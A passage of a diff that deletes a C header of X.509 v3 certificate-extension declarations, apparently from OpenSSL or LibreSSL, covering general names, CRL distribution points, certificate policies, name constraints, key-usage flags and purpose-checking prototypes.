-void (*free_section)(void *db, STACK_OF(CONF_VALUE) *section);
-} X509V3_CONF_METHOD;
-
-/* Context specific info */
-struct v3_ext_ctx {
-#define CTX_TEST 0x1
-int flags;
-X509 *issuer_cert;
-X509 *subject_cert;
-X509_REQ *subject_req;
-X509_CRL *crl;
-X509V3_CONF_METHOD *db_meth;
-void *db;
-/* Maybe more here */
-};
-
-typedef struct v3_ext_method X509V3_EXT_METHOD;
-
-DECLARE_STACK_OF(X509V3_EXT_METHOD)
-
-/* ext_flags values */
-#define X509V3_EXT_DYNAMIC	0x1
-#define X509V3_EXT_CTX_DEP	0x2
-#define X509V3_EXT_MULTILINE	0x4
-
-typedef BIT_STRING_BITNAME ENUMERATED_NAMES;
-
-typedef struct BASIC_CONSTRAINTS_st {
-int ca;
-ASN1_INTEGER *pathlen;
-} BASIC_CONSTRAINTS;
-
-
-typedef struct PKEY_USAGE_PERIOD_st {
-ASN1_GENERALIZEDTIME *notBefore;
-ASN1_GENERALIZEDTIME *notAfter;
-} PKEY_USAGE_PERIOD;
-
-typedef struct otherName_st {
-ASN1_OBJECT *type_id;
-ASN1_TYPE *value;
-} OTHERNAME;
-
-typedef struct EDIPartyName_st {
-	ASN1_STRING *nameAssigner;
-	ASN1_STRING *partyName;
-} EDIPARTYNAME;
-
-typedef struct GENERAL_NAME_st {
-
-#define GEN_OTHERNAME	0
-#define GEN_EMAIL	1
-#define GEN_DNS		2
-#define GEN_X400	3
-#define GEN_DIRNAME	4
-#define GEN_EDIPARTY	5
-#define GEN_URI		6
-#define GEN_IPADD	7
-#define GEN_RID		8
-
-int type;
-union {
-	char *ptr;
-	OTHERNAME *otherName; /* otherName */
-	ASN1_IA5STRING *rfc822Name;
-	ASN1_IA5STRING *dNSName;
-	ASN1_TYPE *x400Address;
-	X509_NAME *directoryName;
-	EDIPARTYNAME *ediPartyName;
-	ASN1_IA5STRING *uniformResourceIdentifier;
-	ASN1_OCTET_STRING *iPAddress;
-	ASN1_OBJECT *registeredID;
-
-	/* Old names */
-	ASN1_OCTET_STRING *ip; /* iPAddress */
-	X509_NAME *dirn;		/* dirn */
-	ASN1_IA5STRING *ia5;/* rfc822Name, dNSName, uniformResourceIdentifier */
-	ASN1_OBJECT *rid; /* registeredID */
-	ASN1_TYPE *other; /* x400Address */
-} d;
-} GENERAL_NAME;
-
-typedef STACK_OF(GENERAL_NAME) GENERAL_NAMES;
-
-typedef struct ACCESS_DESCRIPTION_st {
-	ASN1_OBJECT *method;
-	GENERAL_NAME *location;
-} ACCESS_DESCRIPTION;
-
-typedef STACK_OF(ACCESS_DESCRIPTION) AUTHORITY_INFO_ACCESS;
-
-typedef STACK_OF(ASN1_OBJECT) EXTENDED_KEY_USAGE;
-
-DECLARE_STACK_OF(GENERAL_NAME)
-
-DECLARE_STACK_OF(ACCESS_DESCRIPTION)
-
-typedef struct DIST_POINT_NAME_st {
-int type;
-union {
-	GENERAL_NAMES *fullname;
-	STACK_OF(X509_NAME_ENTRY) *relativename;
-} name;
-/* If relativename then this contains the full distribution point name */
-X509_NAME *dpname;
-} DIST_POINT_NAME;
-/* All existing reasons */
-#define CRLDP_ALL_REASONS	0x807f
-
-#define CRL_REASON_NONE				-1
-#define CRL_REASON_UNSPECIFIED			0
-#define CRL_REASON_KEY_COMPROMISE		1
-#define CRL_REASON_CA_COMPROMISE		2
-#define CRL_REASON_AFFILIATION_CHANGED		3
-#define CRL_REASON_SUPERSEDED			4
-#define CRL_REASON_CESSATION_OF_OPERATION	5
-#define CRL_REASON_CERTIFICATE_HOLD		6
-#define CRL_REASON_REMOVE_FROM_CRL		8
-#define CRL_REASON_PRIVILEGE_WITHDRAWN		9
-#define CRL_REASON_AA_COMPROMISE		10
-
-struct DIST_POINT_st {
-DIST_POINT_NAME	*distpoint;
-ASN1_BIT_STRING *reasons;
-GENERAL_NAMES *CRLissuer;
-int dp_reasons;
-};
-
-typedef STACK_OF(DIST_POINT) CRL_DIST_POINTS;
-
-DECLARE_STACK_OF(DIST_POINT)
-
-struct AUTHORITY_KEYID_st {
-ASN1_OCTET_STRING *keyid;
-GENERAL_NAMES *issuer;
-ASN1_INTEGER *serial;
-};
-
-/* Strong extranet structures */
-
-typedef struct SXNET_ID_st {
-	ASN1_INTEGER *zone;
-	ASN1_OCTET_STRING *user;
-} SXNETID;
-
-DECLARE_STACK_OF(SXNETID)
-
-typedef struct SXNET_st {
-	ASN1_INTEGER *version;
-	STACK_OF(SXNETID) *ids;
-} SXNET;
-
-typedef struct NOTICEREF_st {
-	ASN1_STRING *organization;
-	STACK_OF(ASN1_INTEGER) *noticenos;
-} NOTICEREF;
-
-typedef struct USERNOTICE_st {
-	NOTICEREF *noticeref;
-	ASN1_STRING *exptext;
-} USERNOTICE;
-
-typedef struct POLICYQUALINFO_st {
-	ASN1_OBJECT *pqualid;
-	union {
-		ASN1_IA5STRING *cpsuri;
-		USERNOTICE *usernotice;
-		ASN1_TYPE *other;
-	} d;
-} POLICYQUALINFO;
-
-DECLARE_STACK_OF(POLICYQUALINFO)
-
-typedef struct POLICYINFO_st {
-	ASN1_OBJECT *policyid;
-	STACK_OF(POLICYQUALINFO) *qualifiers;
-} POLICYINFO;
-
-typedef STACK_OF(POLICYINFO) CERTIFICATEPOLICIES;
-
-DECLARE_STACK_OF(POLICYINFO)
-
-typedef struct POLICY_MAPPING_st {
-	ASN1_OBJECT *issuerDomainPolicy;
-	ASN1_OBJECT *subjectDomainPolicy;
-} POLICY_MAPPING;
-
-DECLARE_STACK_OF(POLICY_MAPPING)
-
-typedef STACK_OF(POLICY_MAPPING) POLICY_MAPPINGS;
-
-typedef struct GENERAL_SUBTREE_st {
-	GENERAL_NAME *base;
-	ASN1_INTEGER *minimum;
-	ASN1_INTEGER *maximum;
-} GENERAL_SUBTREE;
-
-DECLARE_STACK_OF(GENERAL_SUBTREE)
-
-struct NAME_CONSTRAINTS_st {
-	STACK_OF(GENERAL_SUBTREE) *permittedSubtrees;
-	STACK_OF(GENERAL_SUBTREE) *excludedSubtrees;
-};
-
-typedef struct POLICY_CONSTRAINTS_st {
-	ASN1_INTEGER *requireExplicitPolicy;
-	ASN1_INTEGER *inhibitPolicyMapping;
-} POLICY_CONSTRAINTS;
-
-/* Proxy certificate structures, see RFC 3820 */
-typedef struct PROXY_POLICY_st
-	{
-	ASN1_OBJECT *policyLanguage;
-	ASN1_OCTET_STRING *policy;
-	} PROXY_POLICY;
-
-typedef struct PROXY_CERT_INFO_EXTENSION_st
-	{
-	ASN1_INTEGER *pcPathLengthConstraint;
-	PROXY_POLICY *proxyPolicy;
-	} PROXY_CERT_INFO_EXTENSION;
-
-PROXY_POLICY *PROXY_POLICY_new(void);
-void PROXY_POLICY_free(PROXY_POLICY *a);
-PROXY_POLICY *d2i_PROXY_POLICY(PROXY_POLICY **a, const unsigned char **in, long len);
-int i2d_PROXY_POLICY(PROXY_POLICY *a, unsigned char **out);
-extern const ASN1_ITEM PROXY_POLICY_it;
-PROXY_CERT_INFO_EXTENSION *PROXY_CERT_INFO_EXTENSION_new(void);
-void PROXY_CERT_INFO_EXTENSION_free(PROXY_CERT_INFO_EXTENSION *a);
-PROXY_CERT_INFO_EXTENSION *d2i_PROXY_CERT_INFO_EXTENSION(PROXY_CERT_INFO_EXTENSION **a, const unsigned char **in, long len);
-int i2d_PROXY_CERT_INFO_EXTENSION(PROXY_CERT_INFO_EXTENSION *a, unsigned char **out);
-extern const ASN1_ITEM PROXY_CERT_INFO_EXTENSION_it;
-
-struct ISSUING_DIST_POINT_st
-	{
-	DIST_POINT_NAME *distpoint;
-	int onlyuser;
-	int onlyCA;
-	ASN1_BIT_STRING *onlysomereasons;
-	int indirectCRL;
-	int onlyattr;
-	};
-
-/* Values in idp_flags field */
-/* IDP present */
-#define	IDP_PRESENT	0x1
-/* IDP values inconsistent */
-#define IDP_INVALID	0x2
-/* onlyuser true */
-#define	IDP_ONLYUSER	0x4
-/* onlyCA true */
-#define	IDP_ONLYCA	0x8
-/* onlyattr true */
-#define IDP_ONLYATTR	0x10
-/* indirectCRL true */
-#define IDP_INDIRECT	0x20
-/* onlysomereasons present */
-#define IDP_REASONS	0x40
-
-#define X509V3_conf_err(val) ERR_asprintf_error_data( \
-			"section:%s,name:%s,value:%s", val->section, \
-			val->name, val->value);
-
-#define X509V3_set_ctx_test(ctx) \
-			X509V3_set_ctx(ctx, NULL, NULL, NULL, NULL, CTX_TEST)
-#define X509V3_set_ctx_nodb(ctx) (ctx)->db = NULL;
-
-#define EXT_BITSTRING(nid, table) { nid, 0, &ASN1_BIT_STRING_it, \
-			0,0,0,0, \
-			0,0, \
-			(X509V3_EXT_I2V)i2v_ASN1_BIT_STRING, \
-			(X509V3_EXT_V2I)v2i_ASN1_BIT_STRING, \
-			NULL, NULL, \
-			table}
-
-#define EXT_IA5STRING(nid) { nid, 0, &ASN1_IA5STRING_it, \
-			0,0,0,0, \
-			(X509V3_EXT_I2S)i2s_ASN1_IA5STRING, \
-			(X509V3_EXT_S2I)s2i_ASN1_IA5STRING, \
-			0,0,0,0, \
-			NULL}
-
-#define EXT_END { -1, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0}
-
-
-/* X509_PURPOSE stuff */
-
-#define EXFLAG_BCONS		0x0001
-#define EXFLAG_KUSAGE		0x0002
-#define EXFLAG_XKUSAGE		0x0004
-#define EXFLAG_NSCERT		0x0008
-
-#define EXFLAG_CA		0x0010
-#define EXFLAG_SI		0x0020  /* Self issued. */
-#define EXFLAG_V1		0x0040
-#define EXFLAG_INVALID		0x0080
-#define EXFLAG_SET		0x0100
-#define EXFLAG_CRITICAL		0x0200
-#define EXFLAG_PROXY		0x0400
-#define EXFLAG_INVALID_POLICY	0x0800
-#define EXFLAG_FRESHEST		0x1000
-#define EXFLAG_SS               0x2000	/* Self signed. */
-
-#define KU_DIGITAL_SIGNATURE	0x0080
-#define KU_NON_REPUDIATION	0x0040
-#define KU_KEY_ENCIPHERMENT	0x0020
-#define KU_DATA_ENCIPHERMENT	0x0010
-#define KU_KEY_AGREEMENT	0x0008
-#define KU_KEY_CERT_SIGN	0x0004
-#define KU_CRL_SIGN		0x0002
-#define KU_ENCIPHER_ONLY	0x0001
-#define KU_DECIPHER_ONLY	0x8000
-
-#define NS_SSL_CLIENT		0x80
-#define NS_SSL_SERVER		0x40
-#define NS_SMIME		0x20
-#define NS_OBJSIGN		0x10
-#define NS_SSL_CA		0x04
-#define NS_SMIME_CA		0x02
-#define NS_OBJSIGN_CA		0x01
-#define NS_ANY_CA		(NS_SSL_CA|NS_SMIME_CA|NS_OBJSIGN_CA)
-
-#define XKU_SSL_SERVER		0x1	
-#define XKU_SSL_CLIENT		0x2
-#define XKU_SMIME		0x4
-#define XKU_CODE_SIGN		0x8
-#define XKU_SGC			0x10
-#define XKU_OCSP_SIGN		0x20
-#define XKU_TIMESTAMP		0x40
-#define XKU_DVCS		0x80
-
-#define X509_PURPOSE_DYNAMIC	0x1
-#define X509_PURPOSE_DYNAMIC_NAME	0x2
-
-typedef struct x509_purpose_st {
-	int purpose;
-	int trust;		/* Default trust ID */
-	int flags;
-	int (*check_purpose)(const struct x509_purpose_st *,
-				const X509 *, int);
-	char *name;
-	char *sname;
-	void *usr_data;
-} X509_PURPOSE;
-
-#define X509_PURPOSE_SSL_CLIENT		1
-#define X509_PURPOSE_SSL_SERVER		2
-#define X509_PURPOSE_NS_SSL_SERVER	3
-#define X509_PURPOSE_SMIME_SIGN		4
-#define X509_PURPOSE_SMIME_ENCRYPT	5
-#define X509_PURPOSE_CRL_SIGN		6
-#define X509_PURPOSE_ANY		7
-#define X509_PURPOSE_OCSP_HELPER	8
-#define X509_PURPOSE_TIMESTAMP_SIGN	9
-
-#define X509_PURPOSE_MIN		1
-#define X509_PURPOSE_MAX		9
-
-/* Flags for X509V3_EXT_print() */
-
-#define X509V3_EXT_UNKNOWN_MASK		(0xfL << 16)
-/* Return error for unknown extensions */
-#define X509V3_EXT_DEFAULT		0
-/* Print error for unknown extensions */
-#define X509V3_EXT_ERROR_UNKNOWN	(1L << 16)
-/* ASN1 parse unknown extensions */
-#define X509V3_EXT_PARSE_UNKNOWN	(2L << 16)
-/* BIO_dump unknown extensions */
-#define X509V3_EXT_DUMP_UNKNOWN		(3L << 16)
-
-/* Flags for X509V3_add1_i2d */
-
-#define X509V3_ADD_OP_MASK		0xfL
-#define X509V3_ADD_DEFAULT		0L
-#define X509V3_ADD_APPEND		1L
-#define X509V3_ADD_REPLACE		2L
-#define X509V3_ADD_REPLACE_EXISTING	3L
-#define X509V3_ADD_KEEP_EXISTING	4L
-#define X509V3_ADD_DELETE		5L
-#define X509V3_ADD_SILENT		0x10
-
-DECLARE_STACK_OF(X509_PURPOSE)
-
-BASIC_CONSTRAINTS *BASIC_CONSTRAINTS_new(void);
-void BASIC_CONSTRAINTS_free(BASIC_CONSTRAINTS *a);
-BASIC_CONSTRAINTS *d2i_BASIC_CONSTRAINTS(BASIC_CONSTRAINTS **a, const unsigned char **in, long len);
-int i2d_BASIC_CONSTRAINTS(BASIC_CONSTRAINTS *a, unsigned char **out);
-extern const ASN1_ITEM BASIC_CONSTRAINTS_it;
-
-SXNET *SXNET_new(void);
-void SXNET_free(SXNET *a);
-SXNET *d2i_SXNET(SXNET **a, const unsigned char **in, long len);
-int i2d_SXNET(SXNET *a, unsigned char **out);
-extern const ASN1_ITEM SXNET_it;
-SXNETID *SXNETID_new(void);
-void SXNETID_free(SXNETID *a);
-SXNETID *d2i_SXNETID(SXNETID **a, const unsigned char **in, long len);
-int i2d_SXNETID(SXNETID *a, unsigned char **out);
-extern const ASN1_ITEM SXNETID_it;
-
-int SXNET_add_id_asc(SXNET **psx, char *zone, char *user, int userlen); 
-int SXNET_add_id_ulong(SXNET **psx, unsigned long lzone, char *user, int userlen); 
-int SXNET_add_id_INTEGER(SXNET **psx, ASN1_INTEGER *izone, char *user, int userlen); 
-
-ASN1_OCTET_STRING *SXNET_get_id_asc(SXNET *sx, char *zone);
-ASN1_OCTET_STRING *SXNET_get_id_ulong(SXNET *sx, unsigned long lzone);
-ASN1_OCTET_STRING *SXNET_get_id_INTEGER(SXNET *sx, ASN1_INTEGER *zone);
-
-AUTHORITY_KEYID *AUTHORITY_KEYID_new(void);
-void AUTHORITY_KEYID_free(AUTHORITY_KEYID *a);
-AUTHORITY_KEYID *d2i_AUTHORITY_KEYID(AUTHORITY_KEYID **a, const unsigned char **in, long len);
-int i2d_AUTHORITY_KEYID(AUTHORITY_KEYID *a, unsigned char **out);
-extern const ASN1_ITEM AUTHORITY_KEYID_it;
-
-PKEY_USAGE_PERIOD *PKEY_USAGE_PERIOD_new(void);
-void PKEY_USAGE_PERIOD_free(PKEY_USAGE_PERIOD *a);
-PKEY_USAGE_PERIOD *d2i_PKEY_USAGE_PERIOD(PKEY_USAGE_PERIOD **a, const unsigned char **in, long len);
-int i2d_PKEY_USAGE_PERIOD(PKEY_USAGE_PERIOD *a, unsigned char **out);
-extern const ASN1_ITEM PKEY_USAGE_PERIOD_it;
-
-GENERAL_NAME *GENERAL_NAME_new(void);
-void GENERAL_NAME_free(GENERAL_NAME *a);
-GENERAL_NAME *d2i_GENERAL_NAME(GENERAL_NAME **a, const unsigned char **in, long len);
-int i2d_GENERAL_NAME(GENERAL_NAME *a, unsigned char **out);
-extern const ASN1_ITEM GENERAL_NAME_it;
-GENERAL_NAME *GENERAL_NAME_dup(GENERAL_NAME *a);
-int GENERAL_NAME_cmp(GENERAL_NAME *a, GENERAL_NAME *b);
-
-
-
-ASN1_BIT_STRING *v2i_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
-				X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
-STACK_OF(CONF_VALUE) *i2v_ASN1_BIT_STRING(X509V3_EXT_METHOD *method,
-				ASN1_BIT_STRING *bits,
-				STACK_OF(CONF_VALUE) *extlist);
-
-STACK_OF(CONF_VALUE) *i2v_GENERAL_NAME(X509V3_EXT_METHOD *method, GENERAL_NAME *gen, STACK_OF(CONF_VALUE) *ret);
-int GENERAL_NAME_print(BIO *out, GENERAL_NAME *gen);
-
-GENERAL_NAMES *GENERAL_NAMES_new(void);
-void GENERAL_NAMES_free(GENERAL_NAMES *a);
-GENERAL_NAMES *d2i_GENERAL_NAMES(GENERAL_NAMES **a, const unsigned char **in, long len);
-int i2d_GENERAL_NAMES(GENERAL_NAMES *a, unsigned char **out);
-extern const ASN1_ITEM GENERAL_NAMES_it;
-
-STACK_OF(CONF_VALUE) *i2v_GENERAL_NAMES(X509V3_EXT_METHOD *method,
-		GENERAL_NAMES *gen, STACK_OF(CONF_VALUE) *extlist);
-GENERAL_NAMES *v2i_GENERAL_NAMES(const X509V3_EXT_METHOD *method,
-				 X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *nval);
-
-OTHERNAME *OTHERNAME_new(void);
-void OTHERNAME_free(OTHERNAME *a);
-OTHERNAME *d2i_OTHERNAME(OTHERNAME **a, const unsigned char **in, long len);
-int i2d_OTHERNAME(OTHERNAME *a, unsigned char **out);
-extern const ASN1_ITEM OTHERNAME_it;
-EDIPARTYNAME *EDIPARTYNAME_new(void);
-void EDIPARTYNAME_free(EDIPARTYNAME *a);
-EDIPARTYNAME *d2i_EDIPARTYNAME(EDIPARTYNAME **a, const unsigned char **in, long len);
-int i2d_EDIPARTYNAME(EDIPARTYNAME *a, unsigned char **out);
-extern const ASN1_ITEM EDIPARTYNAME_it;
-int OTHERNAME_cmp(OTHERNAME *a, OTHERNAME *b);
-void GENERAL_NAME_set0_value(GENERAL_NAME *a, int type, void *value);
-void *GENERAL_NAME_get0_value(GENERAL_NAME *a, int *ptype);
-int GENERAL_NAME_set0_othername(GENERAL_NAME *gen,
-				ASN1_OBJECT *oid, ASN1_TYPE *value);
-int GENERAL_NAME_get0_otherName(GENERAL_NAME *gen, 
-				ASN1_OBJECT **poid, ASN1_TYPE **pvalue);
-
-char *i2s_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method, ASN1_OCTET_STRING *ia5);
-ASN1_OCTET_STRING *s2i_ASN1_OCTET_STRING(X509V3_EXT_METHOD *method, X509V3_CTX *ctx, char *str);
-
-EXTENDED_KEY_USAGE *EXTENDED_KEY_USAGE_new(void);
-void EXTENDED_KEY_USAGE_free(EXTENDED_KEY_USAGE *a);
-EXTENDED_KEY_USAGE *d2i_EXTENDED_KEY_USAGE(EXTENDED_KEY_USAGE **a, const unsigned char **in, long len);
-int i2d_EXTENDED_KEY_USAGE(EXTENDED_KEY_USAGE *a, unsigned char **out);
-extern const ASN1_ITEM EXTENDED_KEY_USAGE_it;
-int i2a_ACCESS_DESCRIPTION(BIO *bp, ACCESS_DESCRIPTION* a);
-
-CERTIFICATEPOLICIES *CERTIFICATEPOLICIES_new(void);
-void CERTIFICATEPOLICIES_free(CERTIFICATEPOLICIES *a);
-CERTIFICATEPOLICIES *d2i_CERTIFICATEPOLICIES(CERTIFICATEPOLICIES **a, const unsigned char **in, long len);
-int i2d_CERTIFICATEPOLICIES(CERTIFICATEPOLICIES *a, unsigned char **out);
-extern const ASN1_ITEM CERTIFICATEPOLICIES_it;
-POLICYINFO *POLICYINFO_new(void);
-void POLICYINFO_free(POLICYINFO *a);
-POLICYINFO *d2i_POLICYINFO(POLICYINFO **a, const unsigned char **in, long len);
-int i2d_POLICYINFO(POLICYINFO *a, unsigned char **out);
-extern const ASN1_ITEM POLICYINFO_it;
-POLICYQUALINFO *POLICYQUALINFO_new(void);
-void POLICYQUALINFO_free(POLICYQUALINFO *a);
-POLICYQUALINFO *d2i_POLICYQUALINFO(POLICYQUALINFO **a, const unsigned char **in, long len);
-int i2d_POLICYQUALINFO(POLICYQUALINFO *a, unsigned char **out);
-extern const ASN1_ITEM POLICYQUALINFO_it;
-USERNOTICE *USERNOTICE_new(void);
-void USERNOTICE_free(USERNOTICE *a);
-USERNOTICE *d2i_USERNOTICE(USERNOTICE **a, const unsigned char **in, long len);
-int i2d_USERNOTICE(USERNOTICE *a, unsigned char **out);
-extern const ASN1_ITEM USERNOTICE_it;
-NOTICEREF *NOTICEREF_new(void);
-void NOTICEREF_free(NOTICEREF *a);
-NOTICEREF *d2i_NOTICEREF(NOTICEREF **a, const unsigned char **in, long len);
-int i2d_NOTICEREF(NOTICEREF *a, unsigned char **out);
-extern const ASN1_ITEM NOTICEREF_it;
-
-CRL_DIST_POINTS *CRL_DIST_POINTS_new(void);
-void CRL_DIST_POINTS_free(CRL_DIST_POINTS *a);
-CRL_DIST_POINTS *d2i_CRL_DIST_POINTS(CRL_DIST_POINTS **a, const unsigned char **in, long len);
-int i2d_CRL_DIST_POINTS(CRL_DIST_POINTS *a, unsigned char **out);
-extern const ASN1_ITEM CRL_DIST_POINTS_it;
-DIST_POINT *DIST_POINT_new(void);
-void DIST_POINT_free(DIST_POINT *a);
-DIST_POINT *d2i_DIST_POINT(DIST_POINT **a, const unsigned char **in, long len);
-int i2d_DIST_POINT(DIST_POINT *a, unsigned char **out);
-extern const ASN1_ITEM DIST_POINT_it;
-DIST_POINT_NAME *DIST_POINT_NAME_new(void);
-void DIST_POINT_NAME_free(DIST_POINT_NAME *a);
-DIST_POINT_NAME *d2i_DIST_POINT_NAME(DIST_POINT_NAME **a, const unsigned char **in, long len);
-int i2d_DIST_POINT_NAME(DIST_POINT_NAME *a, unsigned char **out);
-extern const ASN1_ITEM DIST_POINT_NAME_it;
-ISSUING_DIST_POINT *ISSUING_DIST_POINT_new(void);
-void ISSUING_DIST_POINT_free(ISSUING_DIST_POINT *a);
-ISSUING_DIST_POINT *d2i_ISSUING_DIST_POINT(ISSUING_DIST_POINT **a, const unsigned char **in, long len);
-int i2d_ISSUING_DIST_POINT(ISSUING_DIST_POINT *a, unsigned char **out);
-extern const ASN1_ITEM ISSUING_DIST_POINT_it;
-
-int DIST_POINT_set_dpname(DIST_POINT_NAME *dpn, X509_NAME *iname);
-
-int NAME_CONSTRAINTS_check(X509 *x, NAME_CONSTRAINTS *nc);
-
-ACCESS_DESCRIPTION *ACCESS_DESCRIPTION_new(void);
-void ACCESS_DESCRIPTION_free(ACCESS_DESCRIPTION *a);
-ACCESS_DESCRIPTION *d2i_ACCESS_DESCRIPTION(ACCESS_DESCRIPTION **a, const unsigned char **in, long len);
-int i2d_ACCESS_DESCRIPTION(ACCESS_DESCRIPTION *a, unsigned char **out);
-extern const ASN1_ITEM ACCESS_DESCRIPTION_it;
-AUTHORITY_INFO_ACCESS *AUTHORITY_INFO_ACCESS_new(void);
-void AUTHORITY_INFO_ACCESS_free(AUTHORITY_INFO_ACCESS *a);
-AUTHORITY_INFO_ACCESS *d2i_AUTHORITY_INFO_ACCESS(AUTHORITY_INFO_ACCESS **a, const unsigned char **in, long len);
-int i2d_AUTHORITY_INFO_ACCESS(AUTHORITY_INFO_ACCESS *a, unsigned char **out);
-extern const ASN1_ITEM AUTHORITY_INFO_ACCESS_it;
-
-extern const ASN1_ITEM POLICY_MAPPING_it;
-POLICY_MAPPING *POLICY_MAPPING_new(void);
-void POLICY_MAPPING_free(POLICY_MAPPING *a);
-extern const ASN1_ITEM POLICY_MAPPINGS_it;
-
-extern const ASN1_ITEM GENERAL_SUBTREE_it;
-GENERAL_SUBTREE *GENERAL_SUBTREE_new(void);
-void GENERAL_SUBTREE_free(GENERAL_SUBTREE *a);
-
-extern const ASN1_ITEM NAME_CONSTRAINTS_it;
-NAME_CONSTRAINTS *NAME_CONSTRAINTS_new(void);
-void NAME_CONSTRAINTS_free(NAME_CONSTRAINTS *a);
-
-POLICY_CONSTRAINTS *POLICY_CONSTRAINTS_new(void);
-void POLICY_CONSTRAINTS_free(POLICY_CONSTRAINTS *a);
-extern const ASN1_ITEM POLICY_CONSTRAINTS_it;
-
-GENERAL_NAME *a2i_GENERAL_NAME(GENERAL_NAME *out,
-			       const X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
-			       int gen_type, char *value, int is_nc);
-
-#ifdef HEADER_CONF_H
-GENERAL_NAME *v2i_GENERAL_NAME(const X509V3_EXT_METHOD *method, X509V3_CTX *ctx,
-			       CONF_VALUE *cnf);
-GENERAL_NAME *v2i_GENERAL_NAME_ex(GENERAL_NAME *out,
-				  const X509V3_EXT_METHOD *method,
-				  X509V3_CTX *ctx, CONF_VALUE *cnf, int is_nc);
-void X509V3_conf_free(CONF_VALUE *val);
-
-X509_EXTENSION *X509V3_EXT_nconf_nid(CONF *conf, X509V3_CTX *ctx, int ext_nid, char *value);
-X509_EXTENSION *X509V3_EXT_nconf(CONF *conf, X509V3_CTX *ctx, char *name, char *value);
-int X509V3_EXT_add_nconf_sk(CONF *conf, X509V3_CTX *ctx, char *section, STACK_OF(X509_EXTENSION) **sk);
-int X509V3_EXT_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section, X509 *cert);
-int X509V3_EXT_REQ_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section, X509_REQ *req);
-int X509V3_EXT_CRL_add_nconf(CONF *conf, X509V3_CTX *ctx, char *section, X509_CRL *crl);
-
-X509_EXTENSION *X509V3_EXT_conf_nid(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-				    int ext_nid, char *value);
-X509_EXTENSION *X509V3_EXT_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-				char *name, char *value);
-int X509V3_EXT_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-			char *section, X509 *cert);
-int X509V3_EXT_REQ_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-			    char *section, X509_REQ *req);
-int X509V3_EXT_CRL_add_conf(LHASH_OF(CONF_VALUE) *conf, X509V3_CTX *ctx,
-			    char *section, X509_CRL *crl);
-
-int X509V3_add_value_bool_nf(char *name, int asn1_bool,
-			     STACK_OF(CONF_VALUE) **extlist);
-int X509V3_get_value_bool(CONF_VALUE *value, int *asn1_bool);
-int X509V3_get_value_int(CONF_VALUE *value, ASN1_INTEGER **aint);
-void X509V3_set_nconf(X509V3_CTX *ctx, CONF *conf);
-void X509V3_set_conf_lhash(X509V3_CTX *ctx, LHASH_OF(CONF_VALUE) *lhash);
-#endif
-
-char * X509V3_get_string(X509V3_CTX *ctx, char *name, char *section);
-STACK_OF(CONF_VALUE) * X509V3_get_section(X509V3_CTX *ctx, char *section);
-void X509V3_string_free(X509V3_CTX *ctx, char *str);
-void X509V3_section_free( X509V3_CTX *ctx, STACK_OF(CONF_VALUE) *section);
-void X509V3_set_ctx(X509V3_CTX *ctx, X509 *issuer, X509 *subject,
-				 X509_REQ *req, X509_CRL *crl, int flags);
-
-int X509V3_add_value(const char *name, const char *value,
-						STACK_OF(CONF_VALUE) **extlist);
-int X509V3_add_value_uchar(const char *name, const unsigned char *value,
-						STACK_OF(CONF_VALUE) **extlist);
-int X509V3_add_value_bool(const char *name, int asn1_bool,
-						STACK_OF(CONF_VALUE) **extlist);
-int X509V3_add_value_int(const char *name, ASN1_INTEGER *aint,
-						STACK_OF(CONF_VALUE) **extlist);
-char * i2s_ASN1_INTEGER(X509V3_EXT_METHOD *meth, ASN1_INTEGER *aint);
-ASN1_INTEGER * s2i_ASN1_INTEGER(X509V3_EXT_METHOD *meth, char *value);
-char * i2s_ASN1_ENUMERATED(X509V3_EXT_METHOD *meth, ASN1_ENUMERATED *aint);
-char * i2s_ASN1_ENUMERATED_TABLE(X509V3_EXT_METHOD *meth, ASN1_ENUMERATED *aint);
-int X509V3_EXT_add(X509V3_EXT_METHOD *ext);
-int X509V3_EXT_add_list(X509V3_EXT_METHOD *extlist);
-int X509V3_EXT_add_alias(int nid_to, int nid_from);
-void X509V3_EXT_cleanup(void);
-
-const X509V3_EXT_METHOD *X509V3_EXT_get(X509_EXTENSION *ext);
-const X509V3_EXT_METHOD *X509V3_EXT_get_nid(int nid);
-int X509V3_add_standard_extensions(void);
-STACK_OF(CONF_VALUE) *X509V3_parse_list(const char *line);
-void *X509V3_EXT_d2i(X509_EXTENSION *ext);
-void *X509V3_get_d2i(STACK_OF(X509_EXTENSION) *x, int nid, int *crit, int *idx);
-
-
-X509_EXTENSION *X509V3_EXT_i2d(int ext_nid, int crit, void *ext_struc);
-int X509V3_add1_i2d(STACK_OF(X509_EXTENSION) **x, int nid, void *value, int crit, unsigned long flags);
-
-char *hex_to_string(const unsigned char *buffer, long len);
-unsigned char *string_to_hex(const char *str, long *len);
-int name_cmp(const char *name, const char *cmp);
-
-void X509V3_EXT_val_prn(BIO *out, STACK_OF(CONF_VALUE) *val, int indent,
-								 int ml);
-int X509V3_EXT_print(BIO *out, X509_EXTENSION *ext, unsigned long flag, int indent);
-int X509V3_EXT_print_fp(FILE *out, X509_EXTENSION *ext, int flag, int indent);
-
-int X509V3_extensions_print(BIO *out, char *title, STACK_OF(X509_EXTENSION) *exts, unsigned long flag, int indent);
-
-int X509_check_ca(X509 *x);
-int X509_check_purpose(X509 *x, int id, int ca);
-int X509_supported_extension(X509_EXTENSION *ex);
-int X509_PURPOSE_set(int *p, int purpose);
-int X509_check_issued(X509 *issuer, X509 *subject);
-int X509_check_akid(X509 *issuer, AUTHORITY_KEYID *akid);
-int X509_PURPOSE_get_count(void);
-X509_PURPOSE * X509_PURPOSE_get0(int idx);
-int X509_PURPOSE_get_by_sname(char *sname);
-int X509_PURPOSE_get_by_id(int id);
-int X509_PURPOSE_add(int id, int trust, int flags,
-			int (*ck)(const X509_PURPOSE *, const X509 *, int),
-				char *name, char *sname, void *arg);
-char *X509_PURPOSE_get0_name(X509_PURPOSE *xp);
-char *X509_PURPOSE_get0_sname(X509_PURPOSE *xp);
-int X509_PURPOSE_get_trust(X509_PURPOSE *xp);
